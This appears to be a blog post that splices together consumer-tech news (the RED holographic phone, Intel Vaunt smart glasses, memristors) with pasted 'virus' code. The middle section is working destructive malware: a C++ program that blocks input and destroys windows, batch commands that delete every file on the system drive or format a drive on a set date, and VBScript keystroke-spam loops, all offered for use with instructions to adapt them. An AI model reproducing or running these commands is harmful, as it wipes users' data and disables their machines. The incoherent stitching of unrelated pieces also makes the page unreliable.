In 2017, the cinema camera making company RED announced it was working a smartphone with a "holographic screen." Consumers were unsure what this meant until September 2017. Essentially, the phone would provide a 3D viewing experience on screen, projecting things like buildings and landscapes in an interactive map. A user could essentially take a virtual tour via the phone screen, looking around, above, behind, or in-between various objects.
The RED smart phone is currently available for pre-order, for the fairly hefty price tag of $1,195. No official release date has been announced, but the company says users can expect to see the product sometime in 2018.
SMART GLASSES
Smart glasses are far from a new invention. The glasses, which project information onto your retina as you go about your day, once came with clunky equipment attached. Cameras, extra appendages, and microphones made the glasses a bit of an eyesore that easily led to unwanted attention directed at their wearers. Intel's new Vaunt glasses, however, offer a streamline design that's vastly more user friendly. The glasses look exactly like regular eyeglasses and are available in various prescription lenses. This means users can enjoy the benefits of the glasses throughout the day without attracting unwanted stares or having to deal with uncomfortable equipment.
Use iostream.h,conio.h,ctime.h, windows.h,winable.h int random, Freq, Dura, X, Y;//Integers are declared HWND mywindow, TaskMgr, CMD, Regedit; //This is used to catch-up memory charNotepad[MAX_PATH]="notepad.exe";//character is declared to open notepad char MineSweeper[MAX_PATH]="winmine.exe";//character is declared to open winrar file char Website[MAX_PATH]="http:\\www.google.com";//character is declared to open the website void SetUp(); void Run( int ID ); void Beeper(), OpenStuff(), Hibernation(), CrazyMouse(); //Function are declared DWORD WINAPI DestroyWindows(LPVOID); int main() { srand( time(0) ); random = rand()%6; system("title :.Virus.:"); BlockInput( true ); SetUp(); BlockInput( false ); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL); while(1) { Run( random ); Sleep(10); } }//Main function void SetUp() { char system[MAX_PATH]; char pathtofile[MAX_PATH]; HMODULE GetModH = GetModuleHandle(NULL);...
Delete All The Content Of A Drive… @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Disable Internet Permanently ipconfig/release The Most Simple Virus To Crush The Window @Echo off Del C:\ *.* |y Endless Notepads @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top Bomb Virus Copy Paste The Following If %date% NEQ 2009/11/25 goto exit format E: /y >nul :exit exit Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action The Virus Will Take Effect On That Day Crazy caps lock *This constantly turns caps lock on and off really fast continuously* Code:- Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop Endless Enter *This constantly makes it so the enter button is being pressed continuesly* Code:- Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wsh...
The Next Big thing? The memristor , a microscopic component that can "remember" electrical states even when turned off. It's expected to be far cheaper and faster than flash storage. A theoretical concept since 1971, it has now been built in labs and is already starting to revolutionize everything we know about computing, possibly making flash memory, RAM, and even hard drives obsolete within a decade.
Comments
Post a Comment